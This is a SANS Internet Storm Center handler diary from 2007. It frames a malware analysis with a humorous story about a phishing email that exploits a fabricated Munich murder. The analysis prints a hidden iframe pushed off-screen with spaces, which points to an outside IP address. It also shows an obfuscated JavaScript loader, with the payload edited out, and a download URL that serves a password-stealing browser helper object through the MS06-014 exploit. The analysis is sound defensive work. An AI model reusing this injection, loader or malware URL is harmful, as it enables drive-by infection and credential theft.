Threat Level: green Handler on Duty: Russ McRee

SANS ISC: InfoSec Handlers Diary Blog - Follow the Bouncing Malware: Day of the Jackal InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Follow the Bouncing Malware: Day of the Jackal

Published: 2007-04-23
Last Updated: 2007-04-24 01:22:48 UTC
by Tom Liston (Version: 1)
0 comment(s)
Otte Normalverbraucher leaned back in his chair, stretched and yawned. It was nearing midnight, and now that he stopped to think about it, he realized that he was going to be very tired in when his alarm clock went off in the morning.

The real problem was that his typing skills just weren't very good. Oh sure, he could type... but he wasn't very fast, or for that matter, very accurate. It had taken him almost two hours to type out his reply to his cousin Joe in America, and even then, looking back over the message, it was filled with typing errors.

He chuckled silently to himself, reminded of an old joke: it didn't matter that he couldn't type very quickly... his cousin, Joe Sixpack, couldn't read very fast either.

Their trans-Atlantic correspondence had transitioned from the days of light-blue onionskin paper and envelopes marked “LUFTPOST/PAR AVION” into the electronic era somewhat seamlessly. He and Joe had been writing back and forth for almost twenty years now-- since both of them were in school. Joe's initial letter had arrived out of the blue-- a message from a cousin he didn't even know he had, living a different life, in a different country. They struck up a friendship and had continued to write back and forth over the years-- they seemed to have so many things in common: they each had a rather boring middle-management job, were married, had two children and were... well... both perfectly “average.” They had each gone out and purchased a computer a few years back as a family Christmas present, and had taken to communicating with each other by email. They had learned about this new technology together, swapping tips and tricks. Joe seemed to know so much about computers... he had explained in long, involved messages exactly how the Internet worked and somehow he manged to find the most amazing things out there on the 'net. He always sent Otte links to funny jokes, online games, and websites that had pictures guaranteed to make even the most worldly person blush. Otte had stored those emails away in a special folder, and even though it was late, he considered doing a little “recreational surfing” before turning in. He had heard that pornographic websites could infect your computer with some kind of virus or disease, but Joe had explained that it was all just a myth made up by left-wing feminists who wanted to keep men from looking a beautiful, naked women. Joe was always so “up” on popular culture and politics.

Otte clicked the “Send” button in his email program and imagined his message to Joe shooting through the long series of tubes that made up the Internet and appearing in Joe's in-box on the other side of the ocean. It was an amazing thing, and he always felt so “high-tech” when he sent email.

It was late, and as inviting at the thought of visiting one of Joe's “special” sites was, he decided that he should shut the machine down and head to bed. Just as he was about to turn the machine off, he heard a stupidly chipper voice announce, “Email für dich!.”

Not only did Joe read slowly, but he also typed about as fast and as well as Otte, so it couldn't be a response so soon. Otte looked at his in-box and saw a new message:

Sender: Web-Nachrichten Deutschlands [info@focus.de]
Subject: In Muenchen ist Trauer angekuendigt
(“In Munich, mourning is announced”)

Otte was concerned. He clicked on the email and read the following:

Innerhalb von einer Stunde beging ein Asiater 6 brutale Morde und verschwand in der unbestimmten Richtung. Der Moerder schlich sich in ein Wohnhaus ein und schlachtete all seine Bewohner inklusive 2 kleiner zehnjaehrigen Maedchen, die heimgegangen sind. Ermordet waren auch alle Haustiere. Die Polizei ist schockiert und macht nun alles Moegliche, um diesen Taeter so schnell wie moeglich finden zu koennen. Dank einiger Passanten gibt es nun eine kurze Beschreibung des Verbrechers. Es wurde eine Belohnung angekuendigt, wenn jemand etwas zu diesem Fall mitteilen kann. Naeheres dazu sowie ein Roboterbild unter http://tanknk.dothome.co.kr

(“Within an hour a Asian national committed 6 brutal murders and vanished in an unknown direction. The murderer sneaked into an apartment house and slaughtered all of the inhabitants including two small 10 year old girls, which went home. Slaughtered also were all pets. Police is shocked and now does all possible to find the culprit as soon as possible. Because of some passerby a short description of the culprit is available. There is an reward announced for hints to the case. Details and also a robot image under...”)

“What is the world coming to?” though Otte as he re-read the message. Only last week he had read, in horror, the story of a mass killing in Virginia in the United States, and now this, right here in Germany. He had followed the details of the earlier story closely, and the parallels with this new tragedy were startling. He needed to know more, but before he clicked on the link, he wrote up a quick translation of the email and sent it off to his cousin... he just knew Joe would be as interested as he was.

Welcome to the Jungle


(OK... Once again, I find myself in the rather unenviable position of having to warn those of you whose brain waves fall a little short of the beach not to shoot yourselves in the foot. So... if you find that people are always questioning the number of angels that could dance on your head: DO NOT GO TO ANY OF THE SITES I MENTIONED IN THIS LITTLE MALWARE DECONSTRUCTION. JUST DON'T.)

Otte was going to be a bit disappointed... The link in that email wasn't going to take him to a story about a tragic mass murder in Munich, but instead to a rather uninteresting page in which free accounts at “dothome.co.kr” are described in Korean. But, buried deep within the page we find a little gift that someone placed within the HTML:

<iframe style='visibility: hidden;'width='1' height='1' src='http://203.223.158.26/africaonline/2/'>
</iframe>

Note: They hid it waaaaaay off to the right by putting a whole mess of spaces in front of it, 'cause of course no one would ever look over there. You malware dudes crack me up... I can just see 'em... eight or nine guys all sitting around some big wooden table in their Secret Underground Malware Fortress of Doom:

Malware Dude #1: Okay... so we're agreed. We'll put the link to a hidden IFRAME within an otherwise innocuous page.

Malware Dude #2: But wait! What if someone looks at the source code to that page! Won't they be able to see the HTML code that creates the hidden IFRAME?

Malware Dude #1: Drat! Our entire plan is foiled! Curse that “View Page Source” menu item! Now we'll all have to go back to our previous careers, writing high performance Visual Basic apps!

A murmur of discontent courses through the room. There is talk of suicide. Someone mentions storming Redmond and demanding that the offending “View Page Source” option be removed from IE. Then, suddenly, in a shadowy back corner, a PFY stands up, clears his throat, and, in a squeaky voice, says:

Malware PFY: Perhaps we could put a whole bunch of SPACES in front of the IFRAME code. That way it would be pushed over to the right hand side and out of sight.

Malware Dude #1: Gasp! Why... why.... that is absolutely brilliant!

Malware Dude #2: Amazing! You sir, are a freakin' genius!

A chorus of cheers and shouts fills the room. High-fives are made. Toasts to the audacity of youth fill the air. A large container filled with Gatorade is inexplicably found sitting in another corner and is promptly dumped over the PFY's head.

And there is much rejoicing.

But, I digress...

The cleverly hidden IFRAME points to a webpage within a subdirectory on a different site that is driven by some PHP code. The PHP code is designed in such a way as to exclude anyone from the fun who visits the site with anything other than IE. You see, the PHP code checks the referrer field of every request coming in, and serves up fun and interesting malware to only those who browse with IE.

Since, of course, I couldn't visit the site with IE without risking possible infection, it was impossible for me to retrieve any of the code.

Hehehehehe.....

Sometimes I crack myself up.

After blatantly lying to PHP, we retrieve the following:

<script language=JavaScript>
function makemelaugh(x){
  var l=x.length,b=1024,i,j,r,p=0,s=0,w=0;
  t=Array(63,42,36,33...[EDITED]...4,11,0,23);
  for(j=Math.ceil(l/b);j>0;j--){
    r='';
    for(i=Math.min(l,b);i>0;i--,l--){
      w|=(t[x.charCodeAt(p++)-48])<<s;
      if(s){
        r+=String.fromCharCode(170^w&255);
        w>>=8;
        s-=2
      }else{s=6}
    }document.write(r)
  }
}
makemelaugh("LuLa_qN5Vvc...[EDITED]...@jWEl")
</script>

(Note: I cleaned it up a whole lot, and edited it as indicated.)

Ok... Some things of interest here:

First off, someone is obviously trying to hide something from us here. The stuff that I edited at the second spot above (the parameter being passed to the makemelaugh() function) was actually several pages of gibberish. That gibberish will get turned back into code that actually does something by the makemelaugh() function.

The second thing I noticed is that although the text of the email is in German (well... sort of... my sources tell me it's pretty crappy German), the function name here is in English: makemelaugh(). Well, LaughingBoy... let's see what you're up to.

There are SO many ways that we could pull this sucker apart. Trust me... this thing is truly the JavaScript equivalent of shoving spaces in front of IFRAME references. It'll take all of about 30 seconds of editing to make this script tell us everything it knows. When are you malware writin' guys going to learn? Obfuscating code in an interpreted language hides about as much as Paris Hilton's underwear.

In any case, shoving some well placed <textarea></textarea> statements into this code and allowing IE to take a crack at it (on an instance of VMware... really, would you expect less?) we end up with an unobfuscated script that my AV tags as “VBS/TrojanDownloader.Small.DO”:

(Note: I tried including the script here in a draft of this piece, but it kept setting off AV alerts unless I edited it down to nothing... that's what happens when the kidz end up copying from each other... so you'll just have to make do with a description...)

The downloaded script attempts to use the issue patched by Microsoft as MS06-014 “Vulnerability in the Microsoft Data Access Components (MDAC) Function Could Allow Code Execution (911562)” It looks to me like the script might have been based off of exploit code published as part of the Metasploit framework (no shot at HD intended... that's just what it looks like...). In this case, the vulnerability does indeed allow for code execution, and the code that gets executed is downloaded from:

http://203.223.158.26/africaonline/2/get.php?file=exe

Again, this is another PHP script that won't give anything up to a non-IE browser. But, after doing a bit more creative lying, we're graced with a download of 102,400 bytes of packed Delphi dropper goodness called “update.exe.” When executed, this drops a file called ipv6monl.dll into the windows\system32 directory and installs it by setting it up to operate as our old friend, a Browser Helper Object (BHO). Update.exe also adds several entries under:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\load

which appear to hold some sort of configuration data. Also, in order to make sure that its nefarious communication will be allowed out of your machine, it diddles with some registry entries to make sure that IE has unfettered access through the Windows firewall. Oh... and if you happened to have turned off the use of BHOs in IE, it helpfully turns them back on. How nice...

What does the LaughingBoy's BHO do? Well, from its vantage point deep inside the bowels of IE (boy... there's an icky metaphor), it captures various information about your computer and any user accounts, grabs any locally cached passwords as well as IE's autocomplete information and any passwords used by Outlook or HotMail, Oh... and if you happen to use any one of several European banks, logging into your account on a compromised machine will result in your username and password being sent off to the bad guys.

Nice, really nice.

And let's not forget that this stellar example of human ingenuity started the whole sordid mess off by exploiting a recent tragedy.

How's this for a business model:

1)Wait for tragedy to strike
2)Send mail exploiting general fear and interest in said tragedy
3)Wait for easily duped people to click on your link
4)$Profit$

LaughingBoy: You have my vote for Scumbag of the Year. Me and 35 other Handlers would like to meet you (preferably in a dark alley) so we can present you with your “award”...

Oh... BTW, LaughingBoy... 'Leet h4xor d00dz don't use MidnightCommander... if you need to install mc when you 0wn a box, you pro'lly need to do a little remedial work on your 'nix command line foo...



-------------------------------------------------------------------------------
Tom Liston - Handler on Duty
Intelguardians

P.S.: Thanks to Josef for translating.  Note: The translation isn't poorly done.  Josef attempted to mimic the style of the original, poorly-written German.  Also, thanks to the inimitable Dr. J. for putting up with my German translation questions...
Keywords:
0 comment(s)
Diary Archives